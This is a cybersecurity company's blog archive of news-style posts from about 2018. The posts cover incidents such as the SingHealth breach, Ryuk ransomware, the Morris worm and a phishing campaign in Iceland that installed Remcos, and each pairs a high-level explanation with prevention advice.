Cybersecurity Blog
Thought leadership. Threat analysis. Cybersecurity news and alerts.
How Advanced Persistent Threat (APT) Attacks WorkThe final report of the Committee of Inquiry (COI), the body tasked to investigate Singapore's worst cyber-attack in its history, concluded that an unnamed Advanced Persistent Threat (APT) group was behind the country’s worst-ever cyber-attack. “The attacker was a skilled and sophisticated actor bearing the characteristics of an Advanced Persistent Threat group,” COI said in its final report. COI was tasked with looking into Singapore’s worst-ever cyber-attack: the data breach on Singapore Health Services Private Limited (SingHealth). The COI report(PDF) released to the public last January 10th is a redacted version of the final report, barring sensitive information that could further harm SingHealth. The unnamed Advanced Persistent Threat group, the COI said, illegally accessed SingHealth’s database and illegally removed personally identifiable information of 1.5 million patients, including their names, addresses, genders, races, and dates of birth between the period of June 27, 2018 to July 4, 2018. Out of the 1.5 million affected patients, nearly 159,000 of these patients also had their outpatient dispensed medication records exfiltrated. The personal and outpatient medication data of Singapore’s Prime Minister were part of the illegally accessed and removed data. What Is an Advanced Persistent Threat (APT) Attack?An Advanced Persistent Threat (APT), as the name suggests, is a threat that’s “advanced”, which means that sophisticated hacking techniques are used to gain access to a system, and this threat is “persistent”, which means that the attacker or attackers remain inside the compromised system for a prolonged period of time, resulting in destructive consequences. APT attacks on nation states, such as the attack on SingHealth, and large corporations are often highlighted. APT attackers are, however, increasingly launching APT attacks on smaller organizations that make up the supply chain in order to gain access to large organizations. APT attackers gain ongoing access to a system through the following series of events: 1. Initial AccessAttackers could gain initial access to a system through various means. It could be through a known software vulnerability that’s left unpatched. In unpatched security vulnerability, a software security update is available but for whatever reasons this update hasn’t been installed. Attackers could also gain access to a system through phishing attacks – cyber-attacks that use an email as a weapon. In a phishing attack, the victim is tricked into clicking a link or downloading an attachment inside an email masquerading as coming from a legitimate entity. In the case of the SingHealth cyber-attack, the COI said, “The attacker gained initial access to SingHealth’s IT network around 23 August 2017, infecting front-end workstations, most likely through phishing attacks.” 2. Establishing FootholdsOnce the attackers gain initial access to the system, they then attempt to establish a foothold or footholds in the system. In establishing a foothold in the system, attackers typically implant a malicious software (malware) into the system to scan and move around the system undetected. In the case of the SingHealth cyber-attack, the COI said the attacker used a “suite of advanced, customized, and stealthy malware” to stealthy move within the system and to find and exploit various vulnerabilities in SingHealth’s system. According to COI, a number of security vulnerabilities in the SingHealth network were identified in a penetration test in early 2017, which may have been exploited by the attacker. At the time of the cyber-attack, COI said a number of these vulnerabilities remained. 3. Intensifying AccessAttackers intensify their access within a system by gaining administrator rights – the highest level of permission that’s granted to a computer user. In the case of the SingHealth cyber-attack, the COI said the group responsible for the SingHealth data breach gained administrative access to SingHealth’s servers as the said servers weren’t protected with 2-factor authentication (2FA), enabling the attacker to access the servers through other means that didn’t require 2FA. 4. Stop, Look and RemainAPT attackers are a patient bunch. These attackers are willing to wait for days, months and even years to achieve their goal, for instance, to remove critical data, only at the right moment. In the case of the SingHealth cyber-attack, the COI said that while the group responsible for the SingHealth data breach was able to infiltrate SingHealth’s servers for months, it was only on June 26, 2018 that the group obtained credentials to the SingHealth’s database containing trove of patients’ data, and then started to remove the trove of data from June 27, 2018 until July 4, 2018. On July 4, 2018, an administrator at Integrated Health Information Systems Private Limited (IHiS) noticed the suspicious activities and then worked with other IT administrators to terminate the exfiltration of data. IHiS was responsible for implementing cyber security measures and also responsible for security incident response and reporting at SingHealth. Prior to the July 4, 2018 discovery, COI said, IHiS’ IT administrators first noticed the unauthorized logins into SingHealth’s servers and failed attempts at accessing the patients’ database on June 11, 12, 13, and 26, last year. PreventionTwo major findings by the COI in the SingHealth cyber-attack stand out: First, remediating the security vulnerabilities identified in early 2017 penetration test would have made it more difficult for the attacker to achieve its objectives. Second, while the attacker operated in a stealthy manner, it wasn’t silent as the IHiS’ staff, in fact, noticed unauthorized activities prior to the actual data exfiltration. Recognizing these unauthorized activities as signs that a cyber-attack was going on and taking appropriate action could have prevented the actual data exfiltration. Contact ustoday if you need assistance in protecting your organization from Advanced Persistent Threat (APT) attacks. Cyber Attack Disrupts Operations of Major U.S. NewspapersCyber criminals ended 2018 with a high-profile cyber attack, this time, attacking Tribune Publishing’s network, resulting in the disruption of the news production and printing process of some of the major newspapers in the U.S. The Los Angeles Timesreported that what was first thought as a server outage at Tribune Publishing’s network was later identified as a cyber attack. Tribune Publishing once owned Los Angeles Times and San Diego Union-Tribune. These 2 newspapers were later sold to a Los Angeles biotech entrepreneur. Despite the sale, these 2 newspapers still share Tribune Publishing’s printing networks. As a result of the cyber attack at Tribune Publishing, the distribution of the December 29thprint edition of these 2 newspapers was delayed. The distribution of the December 29thprint edition of The New York Times and The Wall Street Journal newspapers was also delayed as these two major newspapers share the use of Los Angeles Times’ Olympic printing plant – as the name implies, also used by the Los Angeles Times. The cyber attack on Tribune Publishing also disrupted production of other Tribune Publishing newspapers. Tribune Publishing currently owns Chicago Tribune, New York Daily News, The Baltimore Sun, Orlando Sentinel, South Florida's Sun-Sentinel, Virginia’s Daily Press and The Virginian-Pilot, The Morning Call of Lehigh Valley, Pennsylvania, and the Hartford Courant. Chicago Tribune, for its part, reported that its December 29thprint edition was published without paid death notices and classified ads as a result of the cyber incident at Tribune Publishing. Marisa Kollias, Tribune Publishing spokeswoman, said in a statement that by December 30th, production and delivery were back on track at all concerned newspapers. She didn’t, however, address the details about the cyber attack itself. “We acted promptly to secure the environment while ... creating workarounds to ensure we could print our newspapers,” Kollias said. “The personal data of our subscribers, online users, and advertising clients has not been compromised.” While authorities and Tribune Publishing are silent about the cause of the cyber attack and whether the attacker or attackers asked for a ransom, the Los Angeles Times and Chicago Tribune reported that several individuals with knowledge of the situation said the cyber attack bore the signature of Ryuk ransomware. What Is Ryuk Ransomware?Ryuk is a malicious software (malware) that’s categorized as a ransomware. In a ransomware attack, all or selected files in a computer infected by the ransomware are encrypted – the process of converting plaintext or any other type of data into encoded version, denying legitimate users access to these files. Ransomware victims are informed of the file encryption via a notice shown on the monitor of the infected computer. This notice also functions as a ransom notice. Ransomware is characterized by the fact that victims are asked to pay ransom, typically in the form of cryptocurrency like Bitcoin (also referred as BTC) in the promise that once ransom is paid, a decryption key to unlock the encrypted files would be given. Ryuk was first reported by security researchers at Check Pointon August 20, 2018. The researchers said that 2 weeks prior to August 20th, Ryuk perpetrator or perpetrators attacked various organizations worldwide, earning the attackers over $640,000 in just a span of 2 weeks. Check Point researchers said Ryuk’s early attacks encrypted hundreds of personal computers, storage and data centers in each infected organization. Some organizations paid large ransom in order to retrieve their files. The highest recorded payment was 50 BTC, then priced nearly $320,000. According to Check Point researchers, Ryuk is a highly targeted attack, which requires “extensive network mapping, hacking and credential collection” prior to each operation. In addition to encrypting files in the local drives, Ryuk also encrypts network resources. Analysis of Ryuk conducted by Check Point researchers showed that this ransomware is similar in many ways with another ransomware called “Hermes”. The attack at Far Eastern International Bank (FEIB) in Taiwan in October 2017 brought Hermes into public attention. While Hermes exhibited typical characteristics of a ransomware in the FEIB attack, it acted as a diversion only as the attackers’ ultimate goal was to steal money. The FEIB attackers stole $60 million in a sophisticated SWIFT attack, but the total amount stolen was later retrieved. Unlike Hermes, Ryuk functions not as a diversionary tactic but as the main act. Here are some similarities in Hermes and Ryuk that led the Check Point researchers to conclude that whoever wrote the Ryuk source code had access to the Hermes source code (to date, the source codes of Ryuk and Hermes aren’t publicly available): Similarity in Encryption LogicThe encryption logic in both Hermes and Ryuk is similar in structure. Whitelisting of Similar FoldersBoth Hermes and Ryuk encrypt every file and directory except “Windows”, “Mozilla”, “Chrome”, “RecycleBin” and “Ahnlab”. One explanation why attackers want victims to access search engines like Chrome and Mozilla is to allow victims to search online what the ransom note means. PreventionHere are some best security practices in order to prevent or minimize the effects of ransomware attacks like Ryuk: Implement Network SegmentationNetwork segmentation is the practice of splitting a corporate network into subnetworks. This practice ensures that if one subnetwork is infected with a malware like Ryuk, the other subnetworks won’t be infected. In addition to improving security, network segmentation also boosts efficiency. Back-Up Critical FilesThese are the main reasons why organizations are willing to pay an exceptionally large amount of ransom to cyber attackers: a) victims want to retrieve their files back as these files are important to their existence, and b) victims have no copies of these critical files. Organizations that practice regular back-up of critical files can afford not to pay ransom to attackers. Contact us today if you need assistance in protecting your organization’s resources from ransomware attacks. Top 3 Cyber Security Predictions in 2019Cyber-attacks are becoming more common and have become a looming threat not just to large enterprises but also to small and medium-sized organizations. Here are our top 3 cyber security predictions for the year 2019: 1. Cloud Attack ThreatThere’s a looming threat in the cloud as this is where the data is heading. A study conducted by LogicMonitor(PDF) predicted that majority of IT workloads will move to the cloud by 2020, with workloads running in public clouds will reach 41% in 2020, while workloads running on-premises will fall to 27% and the balance will run on private or hybrid clouds. Another study conducted by Gartnerpredicted cloud computing to be a $300 billion business by 2021. According to Gartner, organizations increasingly adopt cloud services as these have been proven to provide speed, agility and cut cost that digital business requires. There’s, however, a flipside to the positive contributions of cloud computing. The 2nd quarter of 2018 study conducted by Gartner revealed that organizations continue to struggle with cloud security, with an estimated $400 billion lost to cyber theft and fraud worldwide. Expanding cloud services as part of an organization’s digital initiatives is indeed needed, but these initiatives should be matched with a sound cloud security strategy as cyber criminals know that there’s money in the cloud. There are many attack surfaces in the cloud that attackers could easily exploit. For instance, in early 2018, RedLockreported that attackers illicitly used the cloud computing resources of Tesla to mine a cryptocurrency. According to Redlock, attackers were able to gain access to Tesla’s cloud computing resources as Tesla openly exposed its Kubernetes – an open-source platform for managing cloud workloads and services – without password protection. Tesla’s exposed Kubernetes, Redlock said, contained the credentials of Tesla’s Amazon Web Service account. In cryptocurrency mining, those who allow their computers to be used for mining digital coins are financially compensated for the computer and electricity usage. Cryptocurrency mining is legal in most countries but legality ends when this is done without the knowledge and consent of the owner of the computing resource – a cyber crime called “cryptojacking”. Since the most popular cryptocurrency Bitcoin reached an all-time high price of nearly $20,000 in late 2017, there has been a dramatic rise of cryptojacking. 2. Botnet ThreatConnecting almost every computing devices, including servers and Internet of Things (IoT) devices such as routers and security cameras, exposes online resources such as websites to botnet attacks. Botnet, which originates from the words “robot” and “network”, refers to a group of malware-infected computers that’s remotely controlled by an attacker or attackers to conduct malicious activities such as a distributed denial-of-service (DDoS) attack. In a DDoS attack, fake traffic originating from malware-infected devices is directed against a target website, rendering the target website inaccessible to legitimate users. In recent years, cyber attackers have tweaked in a number of ways the source code of the infamous malicious software called “Mirai”. At its peak in 2016, the Mirai malware infected hundreds of thousands of IoT devices worldwide and turned them as a “network of robots” to conduct malicious activities, including DDoS attacks. In October 2016, the Mirai botnet almost brought down the internet when it attacked Dyn, a domain name service (DNS) provider. As a result of the attack on Dyn, 80 popular websites, including Twitter, Amazon, Reddit, Spotify and Netflix temporarily became inaccessible to the public. A notable Mirai variant was recently discovered by researchers at Netscout. While the original Mirai infected IoT devices and turned them as part of a botnet, the Mirai variant discovered by Netscout researchers infected enterprise Linux servers and turned these compromised servers as part of a botnet. Turning hundreds of thousands or millions of IoT devices and a handful of enterprise servers as part of a DDoS botnet could bring down the internet or render many websites inaccessible to the public. It’s important to note that the Mirai and other Mirai variant infections are preventable. The original Mirai infected hundreds of thousands of IoT devices by simply logging to these devices using default or factory username and password combinations. A mere change of default or factory username and password renders the original Mirai useless. The recent Mirai variant discovered by Netscout researchers, on the other hand, infiltrated servers that were unpatched and through brute-force – systematic attempt to guess the correct username and password combination. Patching, that is, the timely installation of a security update, and the use of complex passwords could render this recent Mirai variant useless. 3. Shortage of Cyber Security SkillsWhile it’s widely known that there’s a shortage of cyber security professionals, what isn’t known is how dire the situation is. A study conducted by (ISC)2revealed that the shortage of cyber security professionals around the world has never been more acute, placing the shortage of cyber security professionals at 2.93 million, with roughly 500,000 of these positions located in North America, 2.15 million positions located in Asia-Pacific and the balance located in other parts of the world. “The lack of skilled cybersecurity personnel is doing more than putting companies at risk; it’s affecting the job satisfaction of their existing staff,” the (ISC)2 report said. Happy New Year and stay safe! Email-Borne Threats Still Bypass Current Security System, Study ShowsDespite the advancement in current email security systems, a new study reveals that these security systems still miss a significant number of email-borne threats. In the 3rd quarter of 2018, Mimecastretested 80 million emails that were considered “safe” by current email security systems. The Mimecast study found that out of the 80 million emails deemed to be “safe”, 42,350 emails were found to be impersonation attacks, 17,403 contained malicious software (malware) attachments, 16,581 emails contained dangerous file types and 205,363 malicious URLs were found. Impersonation attacks refer to emails that attempt to impersonate a trusted individual or company in order to gain access to corporate finances or data. Dangerous files, meanwhile, refer to files such as .jsp, .exe, .dll and .src – files that allow a program to run on a computer, exposing the computer to further cyber attacks. According to Mimecast, dangerous files bypassed current email security systems at an increased rate, showing a 25% increase from the last quarterly test. How Prevalent Are Email-Borne Threats?In the first half of 2018, over half-a-billion emails were analyzed by FireEye. It found that less than a third or 32% of email traffic was considered “clean” and delivered to an inbox. FireEye’s analysis found that 1 in every 101 emails had malicious intent. FireEye further found that majority or 90% of the blocked emails contained no malware – 81% of which considered as phishing attacks and 19% considered as impersonation attacks. Cyber criminals see the advantages of leveraging emails as a means to wage cyber-attacks as emails continue to be the preferred form of communication worldwide despite the growth of other technologies such as social networking, instant messaging and chat. Email also maintains its dominance as it’s an integral part of the overall internet experience. An email address is required if you want to use a social networking site or for your bank’s online service. According to The Radicati Group(PDF), over half of the world population uses email in 2018, with the number of worldwide email users expected to top 3.8 billion in 2018 and expected to grow to over 4.2 billion by the end of 2022. The following trends in email-borne threats were observed by FireEye and The Radicati Group: Blended AttacksThe most common form of email-borne threat is the blended attack – a form of attack that combines an email and web access to deliver a malware to an organization’s internal network. In blended attack, the email itself doesn’t contain a malware. The email only facilitates the delivery of the malware as it contains a link that when clicked goes directly to a malicious website and from there the malware is downloaded, then infecting the organization’s internal network. Impersonation Attacks Have Gone MainstreamThe cyber-attack called “business email compromise”, also known as BEC or CEO fraud, is an example of an impersonation attack. In impersonation or BEC attack, an attacker or attackers send a bogus email purportedly from the CEO to a targeted employee, typically one who has access to company finances. Through the bogus email, the attackers request the targeted employee to make an urgent money transfer, usually to a trusted vendor’s new bank account. Many profit and nonprofit organizations had been duped by BEC scammers in recent years. According to the Federal Bureau of Investigation (FBI), BEC scammers, between October 2013 and May 2018, defrauded different organizations worldwide of almost $12.5 million. Email Attack ScheduleMalware-based attacks most likely occur during Mondays and Wednesdays. During Thursdays, malware-less attacks most likely happen. Impersonation attacks, meanwhile, most likely occur during Fridays. One example of the malware-less email is the impersonation email, an email that spoofs domains or uses lookalike domains. Another example of a malware-less malicious email is the blended email, whereby the email contains a link to a malicious URL. An additional example of a malware-less malicious email is one that contains a dangerous file such as an .exe file. One explanation why impersonation emails are sent during Fridays is that impersonation emails typically are bogus emails from an organization’s CEO. During Fridays, especially late Friday afternoon, it’s typically difficult to call or talk in person with the boss – a situation favored by scammers to buy time to trick a targeted employee. How to Prevent Email Attacks?Here are some security measures in order to block or detect email-borne threats: Staff TrainingIn email-based attack, it only takes one click to infect your organization’s internal network. And your weakest link for this particular type of cyber-attack is your staff. Staff training isn’t just a one-shot deal. It needs to be continuous as well as effective. It’s particularly important to train executives and employees dealing with finances to be vigilant against email-borne threats as they’re targeted by criminals, especially in BEC attacks. One way to train your organization's staff is by sending test emails to check their resilience against email-borne threats. Use an Advanced Email Security ToolsTraditional email security tools only block emails that contain malware. An advanced email security tool, in addition to blocking emails laden with malware, blocks malicious emails containing spoofs domains, lookalike domains, emails containing malicious URLs and emails containing dangerous files. Contact us today if you need assistance in protecting your organization’s network from email-borne threats. Helpful Resources11/30/2018 Hard Lessons from a Ransomware AttackHard Lessons from a Ransomware AttackA regional county municipality in the province of Quebec, Canada has learned the hard lessons about cybersecurity after it suffered a paralyzing ransomware attack. Bernard Thompson, reeve of Mekinac regional county municipality, told The Canadian Pressthat the ransomware attack that paralyzed the municipality’s servers gave the municipality hard lessons in cybersecurity. “In the end, in terms of the security of our system, [the ransomware attack] was actually positive,” Thompson said. The cyberattack against Mekinac's servers highlights the importance of protecting your organization's servers against ransomware attacks. How the Mekinac Cyberattack UnfoldedThe Canadian Press reported that on September 10, this year, municipal employees, upon returning to work after a weekend break, found a ransomware notice on their working computers, informing them that their files are locked. The ransomware notices also specified that in order to unlock the files, a total of 8 Bitcoins, then equivalent to $65,000, must be paid to the attackers. The municipality’s servers were disabled for nearly 2 weeks as a result of the ransomware attack. The attack ended when the municipality negotiated and paid $30,000-worth of Bitcoin as ransom payment to unlock the locked files. “It was hard, clearly, on the moral side of things that we had to pay a bunch of bandits,” Thompson said. He said this was the road that the municipality took as choosing the other way could mean months of data re-entry, costing significantly more than $30,000. Mekinac’s ransomware attackers are still unidentified and their location not determined to date. What is a Ransomware Attack?Ransomware is a malicious software (malware) that encrypts files. Encryption is traditionally used to prevent data theft. In encryption, plaintext or any other form of data is converted from a readable format into an encoded version – a format that can only be readable if one has access to a decryption key. In a ransomware attack, attackers convert the victim’s data from a readable format into an encoded version and demand from the victim ransom payment in exchange for the decryption key. Ransomware infects computers or servers in many ways. Here are some of the ways that ransomware infects computers or servers: 1. Email-Based AttackIn the case of the Mekinac ransomware attack, the municipality’s servers were infected by a ransomware after an employee opened and clicked on a link in a malicious email sent by the attackers. It wasn’t specified, however, what particular ransomware hit the Mekinac’s servers. The ransomware called “Locky” is an example of a ransomware that’s spread via email spam campaigns. This ransomware arrives in a victim’s computer through a Microsoft Office email attachment that evades antispam filters and tricks the user to open the attachment. Once this malicious attachment is clicked, Locky encrypts computer files and then demands the victim to pay a ransom to unlock the encrypted or locked files. 2. Drive-By AttackDrive-by attack is another way by which attackers infect computers or servers. Bad rabbit ransomware is an example of a ransomware that’s distributed via drive-by attacks. In a drive-by attack, attackers insert a malicious code, in this case, a ransomware, into an insecure website. Once a user visits this compromised site, the malware may either directly download to the visitor’s computer or the visitor is redirected to another website controlled by the attackers and from there the malware is downloaded to the victim’s computer. 3. Unpatched ServersThe ransomware called “SamSam” is an example of a ransomware that infects servers when they’re in an unpatched state. An unpatched server is one that isn’t updated despite the availability of a security update. Researchers at Cisco Talos, in a blog post, wrote, “Adversaries are exploiting known vulnerabilities in unpatched JBoss servers before installing a web shell, identifying further network connected systems, and installing SamSam ransomware to encrypt files on these devices.” Lessons from Ransomware AttacksThompson, reeve of Mekinac regional county municipality, said that the ransomware attack on Mekinac’s servers taught the municipality to encrypt everything and to analyze every email. “Everything is encrypted now,” Thompson said. “Every email is analyzed before we even receive it. Every day, our system catches malicious emails trying to penetrate – but they are stopped. But the attacks keep coming.” In addition to encryption and email scanning, here are additional best practices in order to protect your organization’s servers from ransomware attacks: Back Up Important FilesBack up files that are stored in safe storages that aren’t connected to your organization’s servers give your organization assurance that if anything happens with the servers, for instance, a ransomware attack, your organization will still have other copies of the important files. This eliminates the pressure of paying ransom to attackers for the decryption key to unlock the locked files. Keep All Software Up-To-DateMake sure that all your organization’s software, specifically the server operating system, are up-to-date. Every security update or patch issued by software vendors contains fixes of security vulnerabilities that cybercriminals are quick to exploit. Implement Domain WhitelistingWhitelisting certain domains won’t prevent drive-by download attacks, but it’ll prevent secondary malicious websites from loading. Limit the Number of Users with Administrator PrivilegesA computer user with administrator privileges can install and uninstall software and change configuration settings. Limiting this privilege to a limited number of personnel limits the exposure of your organization’s servers to drive-by attacks. When your organization needs help, our experts are a phone call away. Contact ustoday to prevent ransomware attacks. 11/12/2018 Why the Pentagon Data Breach is a Wake-up Call for Better Screening of Third-party VendorsWhy the Pentagon Data Breach is a Wake-up Call for Better Screening of Third-party VendorsOn October 14 2018, news of a major data breach at the Pentagonhit the headlines. This was a startling, even disturbing, reminder that even the most important, most secure institutions in the world are vulnerable when hackers identify a way into their systems. As the Department of Defense’s headquarters, the Pentagon plays a critical role in the United States military and national security: it oversees all aspects of the Air Force, Marines, Army, Coast Guard and Navy, ultimately helping to defend the country. The very notion that a global symbol of security and power would fall prey to a data breach has surprised many,but it shouldn’t have. At a time when cyber-criminals continue to employ increasingly-sophisticated techniques to disrupt business and organizations of all kinds, this incident is proof positive that proper screening of third-party vendors is critical for effective cybersecurity. What Data was Involved in The Pentagon Breach?It’s believed as many as 30,000 employees’ travel records were compromised as a result of the data breach. This includes personal details and credit-card data pertaining to civilians and military personnel: all sensitive information that could have serious financial repercussions if acted upon. The breach may have first occurred months before it was discovered, and it’s believed the actual number of people potentially affected could rise as the investigation continues. However, no classified information is said to have been compromised. How Did the Pentagon Breach Happen?The Pentagon breach was the result of workconducted by a ‘single commercial vendor’, delivering its service to a ‘very small percentage’ of the DoD’s employees. The vendor in question has remained anonymous and was, in the days after the announcement, still contracted to provide its services. News of the breach struck after the U.S. Government Accountability Office confirmed that work had been undertaken to secure the Pentagon’s networks, though its weapons system security was under closer scrutiny. They claimed they face more and more challenges in keeping weapons systems secure, due to the rise of sophisticated cyber-crime tactics. Pentagon personnel have faced similar issues before. A large attack on the federal Office of Personnel Managementin 2015 left the personal details of over 21 million individuals (including people at the Pentagon) compromised. As with this latest incident, the 2015 attack supposedly first occurred months before word of it reached the media. Who was Responsible for The Pentagon Breach?One or more attackers seized an opportunity to exploit the vendor’s access to the Pentagon’s network, ultimately stealing the travel records. Little else is known. This incident, though, is a prime example of how ambitious (or, rather, brazen) cyber-criminals are in their choice of targets. While some may focus on distributing ransomware to small businesses in exchange for payment, others are clearly setting their sights a little higher. The tools and technology available to such individuals empowers them to exploit weaknesses in even those systems that should be the most airtight in the world. While the exact circumstances surrounding the vulnerability created by the vendor remain secret, it’s no doubt the company responsible is determined to avoid such an oversight happening again. It’s also highly likely that the vendor has a strong reputation and valuable experience to have even secured the contract with the Department of Defense in the first place. This entire incident demonstrates why it’s so vital for businesses and organizations of all sizes, in all sectors, to perform thorough screening of any vendors they intend to work with. Screening Vendors, Protecting Your BusinessNo business or organization should ever start working with a vendor without checking their credentials and their background. Simply settling on the first firm on your radar may not deliver the results you expect — and any mistakes or general incompetence on their part could have major repercussions. You might not have data pertaining to thousands or even millions of civilians in your records, but you could still be risking your customers’ and employees’ privacy by choosing a sub-par team. If a data breach were to rock your company or organization, the damage could be extensive. First and foremost, those customers whose details have been compromised would be incredibly unlikely to keep working with you in the future. Fast, effective action can help to minimize the fallout and keep their finances safe from unauthorized access, but their perception of your brand would still be soured. Your reputation would be affected too, making it more difficult to build trust with new customers or affiliates. That’s not to mention the sheer disruption a breach could cause to your everyday operations, leaving you unable to deliver the services your customers expect for hours, days or longer. This equates to a potential loss of business and, sadly, income. Undertaking effective, in-depth screening of your vendors is the smart choice. Look into any reviews you can find online to learn more about the quality of service previous clients have received. Did they perform as required? Did they use the right processes and achieve the goals they set out to with respect for the client’s security needs? You may consider approaching some of these clients to get a deeper insight into their experience. Make sure to speak with prospective vendors at length, to get a better idea of how they work, what security measures they take to safeguard systems against breaches and more. You can only ask so many questions and ask for so many examples of their prior work before making your decision but doing your research will help ensure the safest choice for your business or organization. At The Driz Group, we’re committed to helping our clients stay protected and compliant, minimizing the risk of cyber-attacks using the latest, automated third-party screening technologies. Want to learn more about what we can do for you? Just get in touch! Look Back into the First Major Cyberattack: The Morris WormThirty years ago, the Morris worm, dubbed as the first major cyberattack, was unleashed into the wild, crashing or slowing to a crawl 10% or 6,000 of the 60,000 computers then connected to the “Internet”. What Is Morris Worm?Morris worm is named after its creator Robert Tappan Morris. A worm, meanwhile, refers to a type of malicious software (malware) that has the ability to spread itself within networks without user interaction. Courtdocuments showed that Morris, then a first-year graduate student at Cornell University's computer science Ph.D. program, released the worm on November 2, 1988 through a computer at the Massachusetts Institute of Technology (MIT), which Morris hacked using a Cornell University's computer. Morris worm was released into the wild a year before the world wide web came into existence. The term “Internet” then referred to a U.S. computer network, composed of connected computers from prestigious colleges, research centers, governmental and military agencies. In less than 24 hours on November 2, 1988, Morris worm infected the computers of institutions, including Harvard, Princeton, Stanford, Johns Hopkins, National Aeronautics and Space Administration (NASA) and the Lawrence Livermore National Laboratory. While the worm didn’t destroy or damage files, infected computers slowed to a crawl or ceased functioning and emails were delayed for days. The estimated cost of dealing with the Morris worm at each installation ranged from $200 to over $53,000. The worm infected computers running a specific version of the Unix operating system in 4 ways: First, via a security vulnerability in “SEND MAIL”, a computer program that transfers and receives electronic mail; Second, via a security vulnerability in the "finger demon", a computer program that allows extraction of limited information about the users of another computer; Third, via "trusted hosts" feature that allows a user with certain privileges on one computer to have equivalent privileges on another computer without using a password; and Fourth, via a program that guesses passwords using various combinations of letters tried out in rapid succession, hoping that one will be an authorized user's password. When the correct password is entered, the intruder is allowed whatever level of activity that the user is authorized to perform. Morris designed the worm to stay hidden. The worm was designed in such a way that it won’t copy itself onto a computer that already had a copy. The worm was also designed in such a way that it would be killed when a computer was shut down. Consequences of the Morris WormFor unleashing the worm into the wild, Morris became the first person convicted for violating the U.S. Computer Fraud and Abuse Act, which outlaws unauthorized access to protected computers. He was sentenced to 3 years of probation, 400 hours of community service, a fine of $10,050 and the costs of his supervision. The first major cyberattack perpetrated by the Morris worm showed how vulnerable interconnected computers had become. Just days after the Morris worm attack, the U.S. Government created the country’s first computer emergency response team under the direction of the Department of Defense. Developers also began creating intrusion detection software. On the flip side, the Morris worm inspired a new breed of malicious hackers, plaguing the digital age. In recent memory, the worm that resembles the devastation caused by Morris worm is the WannaCry worm, commonly known as WannaCry ransomware. In less than 24 hours on May 12, 2017, more than 300,000 computers in 150 countries were infected by WannaCry, each demanding a ransom payment. WannaCry is categorized as a worm as similar to the Morris worm as it has the ability to spread itself within networks without user interaction. WannaCry specifically exploited the security vulnerability in Server Message Block Protocol (SMB protocol) in some versions of Microsoft Windows. SMB protocol allows users to access files, printers and other resources on a network. PreventionHere are some cybersecurity measures to protect your organization’s computers or networks from worms similar to WannaCry and Morris worms: Implement Network SegmentationIn network segmentation, vital computers that housed critical information and operations are separated or disconnected from computers connected to vulnerable systems like the public internet. Network segmentation ensures that when internet-facing computers are infected by a worm, these vital computers aren’t affected. Keep All Software Up-to-DateMake sure that software security updates are installed as timely as possible, not months or years after the release dates of the security updates. Cyberattackers have automated the process of scanning the internet for finding vulnerable computers – those that fail to install security updates. This was the case for WannaCry victims as they failed to install the security update issued by Microsoft months before the WannaCry cyberattack. Refrain from Using Legacy Hardware and SoftwareThe term “legacy” refers to old and outdated computer hardware or software. Similar to computers that fail to timely install security updates, legacy hardware and software programs are similarly targetted by cyberattackers as these legacy hardware and software programs no longer receive security update from their vendors. Some versions of the Microsoft Windows (Windows XP, Windows 8, and Windows Server 2003 operating systems) were targeted by WannaCry attackers as well as during the attack these software programs were no longer supported by Microsoft. A day after the WannaCry attack, however, Microsoft released security updates for Windows XP, Windows 8, and Windows Server 2003. Protecting computers or networks from worms and other malicious software is important in order to prevent data breaches. Under Canada’s Digital Privacy Act, starting November 1 this year, private organizations are mandated to notify the Privacy Commissioner of Canada and the affected individual “as soon as feasible” in the event that a data breach poses a “real risk of significant harm” to any individual. When you need help assessing and mitigating the cybersecurity risks, contact out team of expertsand minimize the likelihood of a data breach. 10/14/2018 Latest Phishing Campaign Attempts to Install Remcos Remote Access Tool into Victims' ComputersLatest Phishing Campaign Attempts to Install Remcos Remote Access Tool into Victims' ComputersThousands of Icelanders have been targeted in the latest phishing campaign that attempts to install the Remcos remote access tool into the victims' computers, this according to the recent report by Cyren. While the actual victims may seem low, Cyren said, this could be the largest cyberattack to hit Iceland, a country with just close to 350,000 population. Latest Phishing Attack Modus OperandiMagni Reynir Sigurðsson, senior threat analyst at Cyren, reported that the phishing campaign targeting Icelanders, which has been observed since October 6th, begins with an email impersonating the Lögreglan – Icelandic police. The email requests the recipient to come to the police station for questioning. The email also threatens the recipient that an arrest warrant may be issued in case of non-compliance. The attackers registered the domain name www[dot]logregian[dot]is. This domain name, on the first glance, is very similar to the official domain name of the Icelandic police www[dot]logreglan[dot]is. The only difference is that the “l” in the official site is changed to “i”. Buying this similarly named domain enables the attackers to send emails with sender address ending in “logregian[dot]is”, which on the first glance, closely resembles the emails from the official Icelandic police ending in “logreglan[dot]is”. The link provided in the phishing email that purportedly leads to additional information about the case leads to the phishing site www[dot]logregian[dot]is that strikingly resembles the official site of the Icelandic police www[dot]logreglan[dot]is.
In the phishing site, the victim is asked to provide an Icelandic social security number. Unlike other phishing sites which can be fooled by entering wrong data, this phishing site knows whether the victim is entering the wrong social security number or not. When a wrong number is entered, an error alert is shown, and when the number entered is correct, this leads to a new phishing webpage that displays the victim's actual name. Sigurðsson hypothesized that the phishers used a database, containing Icelanders’ social security numbers and actual names, that was leaked years ago. Being able to match the social security number with actual name further give credence to this phishing campaign. To give further credence to this campaign, the attackers ask the victim to enter the authentication number contained in the email that was sent to him. Entering the authentication number leads the victim to another phishing webpage that automatically downloads a .rar file that purportedly contains additional document about the case. When this .rar file is extracted, a .scr file (Windows Screensaver) disguised as a Word document with file name “Boðun í skýrslutöku LRH 30 Óktóber.scr”, roughly translated to English as “Called in for questioning by the police on October 30th” is shown. When this disguised Word document is executed, a file called “Yfirvold.exe” and “Yfirvold.vbs” are dropped into the victim's computer. Sigurðsson said that the Yfirvold.vbs file is placed in the Windows Startup folder so that in case the victim reboots his computer the .vbs script will execute Yfirvold.exe – a malware that uses the code and components from a known remote access tool called “REMCOS”. What Is REMCOS? REMCOS stands for Remote Control & Surveillance Software. This software is sold online by the company called “Breaking Security”. Remcos’ price ranges from €58 to €389. Buyers of Remcos can also pay using a variety of cryptocurrencies. Breaking Security markets Remcos as a legitimate software that allows users to remotely control and monitor Windows operating system, from Windows XP and all versions thereafter, including server editions. In addition to selling Remcos, Breaking Security also offers Octopus Protector, keylogger and mass mailer. Octopus Protector encrypts a file laden with malware on the disk, allowing it to bypass several antivirus protections. Keylogger records and sends the keystrokes made on a computer, while a mass mailer sends large volumes of emails. In the case of the phishing attack targeted against thousands of Icelanders, according to Sigurðsson, the Remcos that’s installed into the victims’ computers comes with keylogging capability, collecting input from the victims’ keyboards and storing them in logs and then uploading them to the command and controller servers controlled by the attackers. These servers, Sigurðsson 